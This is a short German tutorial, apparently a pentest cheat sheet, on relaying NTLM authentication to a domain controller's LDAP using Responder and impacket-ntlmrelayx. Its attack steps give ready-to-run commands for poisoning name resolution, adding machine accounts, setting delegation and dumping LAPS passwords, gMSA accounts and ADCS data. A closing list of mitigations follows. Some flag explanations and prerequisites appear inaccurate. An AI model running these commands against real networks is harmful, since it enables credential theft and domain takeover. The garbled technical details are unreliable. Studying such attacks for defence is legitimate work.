NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP

Ziel

Ein Angreifer leitet die NTLM-Authentifizierung eines Windows-Clients auf einen Domain Controller (DC) um, um:

• Benutzer-Hashes zu stehlen (für Passwort-Cracking oder Pass-the-Hash)
• Schädliche Gruppenrichtlinien (GPOs) zu erstellen
• Neue Benutzer mit Admin-Rechten anzulegen

Voraussetzungen

• Netzwerkzugriff zum Ziel-Subnetz
• LLMNR/NBT-NS-Poisoning aktiv auf Zielgeräten
• SMB-Signing nicht erzwungen auf dem DC
• Domain Controller mit LDAP/SMB-Exposition

Angriffsablauf

Schritt 1: Responder für Poisoning konfigurieren

responder -I eth0 -wrf

• -I: Netzwerkinterface
• -w: WPAD-Rogue-Server
• -rf: Aktiviere FTP/SMB-Rogue-Server

Schritt 2: NTLM-Relay auf LDAP starten

impacket-ntlmrelayx -t ldap://dc01.domain.local -smb2support \
--remove-mic --add-computer --delegate-access \
--dump-laps --dump-gmsa --dump-adcs

Schritt 3: Erfolgreichen Relay nutzen

Nach erfolgreichem Relay erscheinen gesammelte Daten:

• Benutzer-Hashes
• LAPS-Passwörter
• GMSA-Konten
• ADCS-Zertifikate

Schutzmaßnahmen

• LLMNR/NBT-NS deaktivieren
• SMB-Signing erzwingen
• LDAP-Signing und Channel Binding aktivieren
• NTLM vollständig deaktivieren (Kerberos bevorzugen)